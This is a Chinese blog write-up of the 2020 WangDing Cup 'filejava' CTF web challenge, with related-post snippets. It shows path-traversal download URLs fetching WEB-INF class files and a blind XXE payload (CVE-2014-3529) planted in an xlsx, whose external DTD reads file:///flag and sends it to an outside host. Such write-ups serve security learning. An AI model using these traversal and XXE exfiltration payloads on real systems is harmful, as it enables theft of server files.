[网鼎杯 2020 青龙组]filejava

已于 2022-01-27 18:39:37 修改
阅读量784 收藏 2
点赞数 1
分类专栏: writerup 文章标签: ctf writeup web安全
于 2022-01-27 17:45:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49835838/article/details/122718372
版权

任意文件下载

在这里插入图片描述

入眼是一个上传框,我们先随意上传一个正常图片试试水

在这里插入图片描述

拿到文件下载地址,尝试一下能否任意文件下载

抓下载的包尝试目录穿越

在这里插入图片描述

成功下载web.xml的内容

在这里插入图片描述

所有class文件都在**/WEB-INF/classes**继续下载所有的class文件,注意不要忘了class后缀

在这里插入图片描述

/DownloadServlet?filename=..%2f..%2f..%2f..%2fWEB-INF%2fclasses%2fcn%2fabc%2fservlet%2fDownloadServlet.class
/DownloadServlet?filename=..%2f..%2f..%2f..%2fWEB-INF%2fclasses%2fcn%2fabc%2fservlet%2fListFileServlet.class
/DownloadServlet?filename=..%2f..%2f..%2f..%2fWEB-INF%2fclasses%2fcn%2fabc%2fservlet%2fUploadServlet.class

将三个文件拖入idea反编译,发现关键代码

在这里插入图片描述

暴露了使用的依赖poi-ooxml的版本信息3.10,去神奇的搜索引擎搜索一下它的漏洞

在这里插入图片描述
刚好可以利用,那么接下来就是漏洞复现的过程了

CVE-2014-3529

此漏洞需要一台vps进行配合,因为是盲打xxe,数据需要带外才能看见

我这里是借用的buu平台的linux labs,开启一个靶机后会给你一个url可以被外网访问,外网81端口映射的是靶机的80端口,是个apache的web服务。因为只有一个端口可以用,我们把dtd文件放在这个web服务上,flag也发到这个web服务上即可
在这里插入图片描述

新建个xlsx文件,后缀改zip解压

在这里插入图片描述

在**[Content_Types].xml**中插入恶意xml代码,引入我们vps上的外部实体

<!DOCTYPE convert [
<!ENTITY % test SYSTEM 'http://2c45ed92-c49e-4f58-881c-78a9cac2d194.node4.buuoj.cn:81/server.dtd'> %test; %exe; %entity;]>

在这里插入图片描述

改完了后,把它们压缩回zip,改后缀xlsx

在这里插入图片描述

题目代码限制了文件名excel-***.xlsx

在这里插入图片描述

我们vps的web服务器上准备好dtd文件如下

<!ENTITY % file SYSTEM "file:///flag"> 
<!ENTITY % exe "<!ENTITY &#37; entity SYSTEM 'http://2c45ed92-c49e-4f58-881c-78a9cac2d194.node4.buuoj.cn:81/%file;'>">

上传我们的excel-exp.xlsx

vps查看apache访问日志

在这里插入图片描述
在这里插入图片描述

url解码得到flagflag{1773660f-ee5a-4ad0-84ac-e8029f518c22}

b1ackc4t
关注
专栏目录
2020网鼎杯青龙-filejava
box
08-25 373
网鼎杯 2020 青龙filejava 0x00 访问连接发现是个文件上传表单 尝试上传一个文件 发现上传之后可以下载 发现这个 url格式和常见的文件下载类似,可能存在下载漏洞。 尝试目录穿越下载 WEB-INF/web.xml文件,发现穿越四级目录即可 0x02 下载关键class文件 在web.xml配置文件中发现几个class文件 cn.abc.servlet.DownloadServlet 在网站目录对应 classes/cn.abc/servlet/DownloadServlet.cl
2020网鼎杯青龙)--WEB--FileJava(XXE)
a965527596的博客
05-17 2129
FileJava 1.打开题目,只有上传和下载的功能,可以上传任意文件和下载文件,但是不能访问,所以不能用一句话连接,在下载文件功能发现可以下载任意文件,于是将WEB-INF/web.xml页面下载下来,发现有上传和下载的配置文件,由2个类成,将这2个类下载下来。 <?xml version="1.0" encoding="UTF-8"?> -<web-app version="4.0" xsi:schemaLocation="http://xmlns.jcp.org/xml/n
网鼎杯2020青龙——filejava通关思路
m0_61506558的博客
12-28 1459
1、启模式的解析器对象, DocumentBuilderFactory 是一个抽象工厂类,它不能直接实例化,但该类提供了newInstance()方法,这个方法会根据本地平台默认安装的解析器,自动创建一个工厂的对象并返回。驱动程序所必需的接口,其允许应用程序设置和查询解析器中的功能和属性、注册文档处理的事件处理程序,以及开始文档解析。在dnslog平台申请一个域名,点击上传会有数据外带,说明该程序存在漏洞,我们接下来就是要判断是有回显还是没有回显。因为使用了同一个接口,所以这两种方式的调用方法是完全一致的。
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络...
[网鼎杯 2020 青龙] filejava
charai的博客
05-08 181
进去发现就是一个单纯的文件上传接口,试试功能,发现上传后的文件名会给出,还有一个下载连接,点开下载链接发现是这种格式的 http://7b576de9-dd31-4f71-b86d-0a8d5b6ff15f.node4.buuoj.cn:81/DownloadServlet?filename=e5ac31d0-6273-46bb-9863-d5f6d9105523_pwdTop500.txt 可以看见就是对于传入的参数进行下载,这里试试任意文件下载,了解javaweb的目录是 webapps/WE
[网鼎杯 2020 青龙 wp ]filejava
mutou990的博客
08-13 738
知识点 web.xml文件泄露 blind xxe 用到的工具: burpsuit或者hackbar都可以 审题 1打开题目如下 2随便上传一个文件,然后点击下载,抓包 看到有filename,猜测可能存在目录穿越以及任意文件下载 3尝试通过报错来获取网站的绝对路径,设置URL参数filename=../ 4爆出了绝对路径,路径里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取,修改filename参数如下(…/数量随意写几个): filename=../../..
[CTF]网鼎杯2020-青龙-Web-FileJava-WriteUp
胖胖的ALEX
05-14 4545
一、赛题截图 二、做题思路 (1)查看源码,唯一有点用信息:./UploadServlet. (2)虽然题目名称和查看源码./UploadServlet都告诉这是一个JAVA程序,但建议还是访问/robots.txt,碰碰运气。 (3)随便上传一个dog.png图片,用Burpsuite抓包,发现新的URL地址:/DownloadServlet?filename=a6c672c9-a74c-4701-abfc-97d68e3c681d_dog.png (4)Burpsuite拦截下载文件请求URL,
2020网鼎杯---Java文件上传wp
Summer's blog
05-14 8117
前言 一篇文章读懂Java代码审计之XXE看过我这篇博客应该不难,没看过建议在看看。 题解 新建xxe.xlsx文件,修改后缀名xxe.zip解压。 修改[Content-Types].xml <!DOCTYPE ANY [ <!ENTITY % file SYSTEM "file:///flag"> <!ENTITY % remote SYSTEM "http://ip:8089/evil.dtd"> %remote; %all; ]> <root&
【学习笔记13】buu [2020网鼎杯 web] filejava
weixin_43553654的博客
05-13 498
首先打开网站后 就看到了一个明显的上传位置,任意传一个文件,显示上传成功,并且可以下载,用bp抓一下下载的流量包,显示 可以看到可以读取下载文件的内容,那我们试试能不能读取其他文件,如/etc/passwd,可以读取,接下来就尝试读取配置文件WEB-INF/web.xml 这里因为不知道配置文件的具体位置就用../来代替具体多少慢慢试,可以看到再其中显示的各个文件,以...
[网鼎杯 2020 青龙]boom复现
qq_43668710的博客
05-17 2197
2020 网鼎杯 青龙 boom复现 直接开整 下载题目附件,解压后发现是个.exe文件,丢进终端运行 跟着提示继续,任意键: 得到一串md5密文,在线解密解密即可: 输入后得到一个三元一次方程(虽然是初中知识,我却算错好几遍????) 果真是越活越糊涂… 最后算出: x=74 y=68 z=31 输入后又得到一个方程: 我不知道这里是考大数分解还是简单的逆向分析 方法1: 大数分解,直接在线解二元一次方程即可(本来是想写一个脚本来算的,但是…懒) 成功算出x 输进去就得到了flag:
2020年第二届“网鼎杯”网络安全大赛 青龙Web AreUSerialz
热门推荐
艺博东的博客
05-10 1万+
2020年第二届“网鼎杯”网络安全大赛 青龙Web AreUSerialz http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48224380.cloudgame2.ichunqiu.com/ 进入网址 直接在URL后面输入: ?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resour
java神器青龙_[网鼎杯 2020 青龙]filejava
weixin_39887386的博客
03-02 138
知识点web.xml文件泄露blind xxe随便上传一个文件,然后点击下载,抓包看到有filename,猜测可能存在目录穿越以及任意文件下载尝试filename=../看到有一个路径,里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取DownloadServlet?filename=../../../../../../../../../usr/local/to...
CVE-2014-3529
守拙的博客
02-28 5082
一、 漏洞影响 poi-ooxml3.10及以下 二、环境搭建 1. 漏洞环境使用大佬的java靶场:https://github.com/JoyChou93/java-sec-code.git。在C盘下新建1.txt,文件内容为success,用于演示文件读取 2. 使用python起一个web服务用来加载远程dtd文件,在web服务目录下放置一个xxe.dtd <!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://192.168.
java对接青龙系统物流业务
最新发布
12-23
青龙系统是一个专业的物流管理平台,而Java是一种广泛应用于企业级应用开发的编程语言。在对接青龙系统物流业务时,可以利用Java的强大功能和灵活性来实现各种业务需求。 首先,可以使用Java编写程序来与青龙系统...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1ackc4t

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值